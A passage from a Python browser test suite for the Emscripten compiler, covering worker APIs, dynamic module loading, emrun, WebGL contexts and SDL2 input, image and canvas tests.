self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args_base = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--no_private_browsing', '--port', '6941']
]:
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
[],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'USE_WEBGL2=1', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
@no_wasm_backend('asm.js-specific')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
# in the emterpreter, check the special assertions mode as well
if not self.is_wasm_backend():
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASSERTIONS=1'] + self.get_async_args())
def test_locate_file(self):
for wasm in ([0, 1] if not self.is_wasm_backend() else [1]):
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@no_wasm_backend('asm.js')
def test_asm_swapping(self):
self.clear()
create_test_file('run.js', r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
create_test_file('second.cpp', self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
self.compile_btest(['second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
self.assertExists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
for defines in [[]]:
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'TOTAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
